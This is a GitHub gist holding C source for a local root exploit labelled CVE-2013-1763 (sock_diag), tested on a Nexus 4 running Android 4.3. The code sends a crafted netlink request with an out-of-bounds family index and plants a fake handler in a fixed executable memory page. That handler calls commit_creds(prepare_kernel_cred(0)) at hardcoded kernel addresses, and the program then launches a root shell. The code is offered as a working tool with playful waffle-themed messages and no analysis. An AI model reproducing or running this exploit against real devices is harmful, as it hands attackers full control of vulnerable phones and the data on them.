Created
August 25, 2015 21:25
-
-
Save strazzere/67d764ffd69141b0254e to your computer and use it in GitHub Desktop.
Waffles! :D
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <unistd.h> | |
| #include <sys/socket.h> | |
| #include <linux/netlink.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <sys/mman.h> | |
| #define NETLINK_SOCK_DIAG NETLINK_INET_DIAG | |
| #define SOCK_DIAG_BY_FAMILY 20 | |
| struct unix_diag_req { | |
| __u8 sdiag_family; | |
| __u8 sdiag_protocol; | |
| __u16 pad; | |
| __u32 udiag_states; | |
| __u32 udiag_ino; | |
| __u32 udiag_show; | |
| __u32 udiag_cookie[2]; | |
| }; | |
| typedef int (* _commit_creds)(unsigned long cred); | |
| typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred); | |
| _commit_creds commit_creds; | |
| _prepare_kernel_cred prepare_kernel_cred; | |
| unsigned long sock_diag_handlers, nl_table; | |
| int give_me_a_waffle() | |
| { | |
| return commit_creds(prepare_kernel_cred(0)); | |
| } | |
| struct sock_diag_handler { | |
| char family; | |
| int (*dump)(void *skb, void *nlh); | |
| }; | |
| struct sock_diag_handler waffled_sock_diag_handler ={ 0, give_me_a_waffle }; | |
| int do_work() { | |
| struct { | |
| struct nlmsghdr nlh; | |
| struct unix_diag_req r; | |
| } req; | |
| int sock = socket(PF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG); | |
| if (sock < 0){ | |
| printf(" [!] Claire called in sick, no waffles today...\n"); | |
| return -1; | |
| } | |
| memset(&req, 0, sizeof(req)); | |
| req.nlh.nlmsg_len = sizeof(req); | |
| req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; | |
| req.nlh.nlmsg_flags = NLM_F_REQUEST; | |
| /*(nf_log_sysctl_fnames - sock_diag_handlers)/4 + 1*/ | |
| req.r.sdiag_family = (0xc11d8204UL - 0xc11d8048UL)/4 + 1; | |
| void *payload = mmap((void*)0x320000, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, -1, 0); | |
| if ((long)payload == -1) { | |
| printf(" [!] The line is to big! Maybe get a waffle next week...\n"); | |
| return -1; | |
| } | |
| memcpy((void *)0x320000, &waffled_sock_diag_handler, sizeof(waffled_sock_diag_handler)); | |
| send(sock, &req, sizeof(req), 0); | |
| } | |
| int main() | |
| { | |
| printf("[*] Android 4.3 waffles (CVE-2013-1763; sock_diag local root exploit) - diff\n"); | |
| printf(" [+] Tested and works on Nexus 4: 4.3 (Takju JWR66Y)\n"); | |
| commit_creds = (_commit_creds) 0xc008e138; | |
| prepare_kernel_cred = (_prepare_kernel_cred) 0xc008e674; | |
| printf(" [+] Requesting waffle...\n"); | |
| do_work(); | |
| if(getuid()) { | |
| printf(" [!] Waffle fell on the floor :(\n"); | |
| return -1; | |
| } | |
| printf(" [+] Yay, waffle is all done - extra gluten!\n"); | |
| execl("/system/bin/sh", "/system/bin/sh", NULL); | |
| } | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment